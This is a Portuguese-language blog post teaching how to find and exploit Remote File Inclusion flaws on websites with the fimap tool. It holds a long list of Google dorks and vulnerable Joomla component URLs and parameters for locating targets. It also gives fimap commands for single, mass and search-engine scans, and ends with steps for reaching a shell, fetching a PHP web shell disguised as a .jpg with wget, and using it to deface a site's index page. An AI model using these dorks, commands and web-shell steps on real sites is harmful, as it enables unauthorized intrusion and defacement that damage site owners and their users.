Olá, vim trazer esse tutorial simples de como explorar a falha Remote File Inclusion com FImap
Primeiramente baixe o fimap: http://code.google.com/p/fimap/downloads/listSegundo tenha ja o Python34 Instalado em seu sistema operacional.
O que é o RFI? :
Remote file inclusion é o nome dado a falha de segurança que permite a um atacante incluir arquivos de fora de um servidor para dentro dele. Podendo assim visualizar arquivos confidencias, senhas, ou incluir no servidor um arquivo malicioso.Dorks para RFI:
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_bca-rss-syndicator&controller= "com_bca-rss-syndicator"
!lfi /index.php?option=com_joomlaupdater&controller= "com_joomlaupdater"
!lfi /index.php?option=com_redshop&view= "com_redshop"
!lfi /index.php?option=com_redtwitter&view= "com_redtwitter"
!lfi /index.php?option=com_wisroyq&controller= "com_wisroyq"
!lfi /index.php?option=com_jinventory&controller= "com_jinventory"
!lfi /index.php?option=com_appointment&controller= "com_appointment"
!lfi /index.php?option=com_datafeeds&controller= "com_datafeeds"
!lfi /index.php?option=com_fabrik&controller= "com_fabrik"
!lfi /index.php?option=com_hsconfig&controller= "com_hsconfig"
!lfi /index.php?option=com_joomlaflickr&controller= "com_joomlaflickr"
!lfi /index.php?option=com_jukebox&controller= "com_jukebox"
!lfi /index.php?option=com_jwhmcs&controller= "com_jwhmcs"
!lfi /index.php?option=com_sebercart&view= "com_sebercart"
!lfi /index.php?option=com_awiki&controller= "com_awiki"
!lfi /index.php?option=com_vjdeo&controller= "com_vjdeo"
!lfi /index.php?option=com_awdwall&controller= "com_awdwall"
!lfi /index.php?option=com_realtyna&controller= "com_realtyna"
!lfi /index.php?option=com_webeecomment&controller= "com_webeecomment"
!lfi /index.php?option=com_javoice&view= "com_javoice"
!lfi /index.php?option=com_foobla_suggestions&controller= "com_foobla_suggestions"
!lfi /index.php?option=com_powermail&controller= "com_powermail"
!lfi /index.php?option=com_pcchess&controller= "com_pcchess"
!lfi /index.php?option=com_spsnewsletter&controller= "com_spsnewsletter"
!lfi /index.php?option=com_alphauserpoints&view= "com_alphauserpoints"
!lfi /index.php?option=com_travelbook&controller= "com_travelbook"
!lfi /index.php?option=com_tweetla&controller= "com_tweetla"
!lfi /index.php?option=com_ticketbook&controller= "com_ticketbook"
!lfi /index.php?option=com_jajobboard&view= "com_jajobboard"
!lfi /index.php?option=com_jajobboard&controller= "com_jajobboard"
!lfi /index.php?option=com_jfeedback&controller= "com_jfeedback"
!lfi /index.php?option=com_jprojectmanager&controller= "com_jprojectmanager"
!lfi /index.php?option=com_preventive&controller= "com_preventive"
!lfi /index.php?option=com_myfiles&controller= "com_myfiles"
!lfi /index.php?option=com_onlineexam&controller= "com_onlineexam"
!lfi /index.php?option=com_joommail&controller= "com_joommail"
!lfi /index.php?option=com_memory&controller= "com_memory"
!lfi /index.php?option=com_market&controller= "com_market"
!lfi /index.php?option=com_diary&controller= "com_diary"
!lfi /index.php?option=com_webtv&controller= "com_webtv"
!lfi /index.php?option=com_horoscope&controller= "com_horoscope"
!lfi /index.php?option=com_arcadegames&controller= "com_arcadegames"
!lfi /index.php?option=com_flashgames&controller= "com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "com_addressbook"
!lfi /index.php?option=com_flexicontent&controller= "com_flexicontent"
!lfi /index.php?option=com_advertising&controller= "com_advertising"
!lfi /index.php?option=com_cvmaker&controller= "com_cvmaker"
!lfi /index.php?option=com_worldrates&controller= "com_worldrates"
!lfi /index.php?option=com_record&controller= "com_record"
!lfi /index.php?option=com_sweetykeeper&controller= "com_sweetykeeper"
!lfi /index.php?option=com_beeheard&controller= "com_beeheard"
!lfi /index.php?option=com_blogfactory&controller= "com_blogfactory"
!lfi /index.php?option=com_delicious&controller= "com_delicious"
!lfi /index.php?option=com_jacomment&view= "com_jacomment"
!lfi /index.php?option=com_lovefactory&controller= "com_lovefactory"
!lfi /index.php?option=com_mtfireeagle&controller= "com_mtfireeagle"
!lfi /index.php?option=com_photobattle&view= "com_photobattle"
!lfi /index.php?option=com_s5clanroster&view= "com_s5clanroster"
!lfi /index.php?option=com_s5clanroster&controller= "com_s5clanroster"
!lfi /index.php?option=com_wgpicasa&controller= "com_wgpicasa"
!lfi /index.php?option=com_zimbcomment&controller= "com_zimbcomment"
!lfi /index.php?option=com_zimbcore&controller= "com_zimbcore"
!lfi /index.php?option=com_gadgetfactory&controller= "com_gadgetfactory"
!lfi /index.php?option=com_matamko&controller= "com_matamko"
!lfi /index.php?option=com_archeryscores&controller= "com_archeryscores"
!lfi /index.php?option=com_multiroot&controller= "com_multiroot"
!lfi /index.php?option=com_multimap&controller= "com_multimap"
!lfi /index.php?option=com_drawroot&controller= "com_drawroot"
!lfi /index.php?option=com_google&controller= "com_google"
!lfi /index.php?option=com_if_surfalert&controller= "com_if_surfalert"
!lfi /index.php?option=com_orgchart&controller= "com_orgchart"
!lfi /index.php?option=com_mmsblog&controller= "com_mmsblog"
!lfi /index.php?option=com_wmi&controller= "com_wmi"
!lfi /index.php?option=com_ultimateportfolio&controller= "com_ultimateportfolio"
!lfi /index.php?option=com_noticeboard&controller= "com_noticeboard"
!lfi /index.php?option=com_smartsite&controller= "com_smartsite"
!lfi /index.php?option=com_graphics&controller= "com_graphics"
!lfi /index.php?option=com_php&file= "com_php"
!lfi /index.php?option=com_aardvertiser&task= "com_aardvertiser"
!lfi /index.php?option=com_jejob&view= "com_jejob"
!lfi /index.php?option=com_jeajaxeventcalendar&view= "com_jeajaxeventcalendar"
!lfi /index.php?option=com_dioneformwizard&controller= "com_dioneformwizard"
!lfi /index.php?option=com_jequoteform&view= "com_jequoteform"
!lfi /index.php?option=com_mscomment&controller= "com_mscomment"
!lfi /index.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_event&view= "com_event"
!lfi /index.php?option=com_product&controller= "com_product"
!lfi /index.php?option=com_job&controller= "com_job"
!lfi /index2.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_perchaimageattach&controller= "com_perchaimageattach"
!lfi /index.php?option=com_perchafieldsattach&controller= "com_perchafieldsattach"
!lfi /index.php?option=com_perchagallery&controller= "com_perchagallery"
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
/allinurl:my_egallery site:.org
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x=
inurl:/index.php?include=
O que é o Fimap?
O fimap é um scanner e explorador semi-automático de remote file inclusion, facilitando assim a vida de um pentester ou webmaster.Instruções Básicas:
Varredura única:
A varredura única é utilizada da seguinte maneira: simplesmente navegasse até o diretório do fimap, e lhe especifica qual url deve ser verificado
Por exemplo: python fimap.py -u www.site.com/page=noticias
Mass Scan:
O Mass scan é simples, consiste em criar um arquivo .txt com um scan de vários sites e mandar o fimap verificar um por um.
por exemplo: python fimap.py -m -l myurllist.txt
Google Scan:
Trata-se de especificar alguma dork ao fimap, para que talvez assim posso verificar diretamente os sites encontrados:
Exemplo:python fimap.py -g -q 'inurl: "include.php"'
Vamos a Prática:
Digamos que temos uma lista de scans de dorks:
Então iremos salva-la na pasta do fimap e digitar o seguinte:
root@Kali:~#cd Desktop/Fimap/# python fimap.py -H -d 1 -m -l ListaDeURLs.txt
Ou faça um scan único root@Kali:~#cd Desktop/Fimap/# python fimap.py -u www.site.com/site.php?page=noticias
root@Kali:~#cd Desktop/Fimap/# python fimap.py -x
Assim ele irá te listar os sites vulneráveis com opções selecionáveis por números, Escolha a opção por exemplo:
>1
Logo após o fimap irá te listar as opções de invasão, selecione por padrão de ataque tudo 1.
Até chegar na shell.
Terceiro Passo: Quando chegar na shell, upe sua shell para alterar a index. Exemplo:
root@Kali:~#cd Desktop/Fimap/#Fimap> wget phpshell.php.jpg
Depois disso basta abir sua shell no servidor: www.site.com/site.php?page=phpshell.php.jpg
Bom amigos, então é isso espero que tenham gostado. Em breve mais posts :)
Nenhum comentário:
Postar um comentário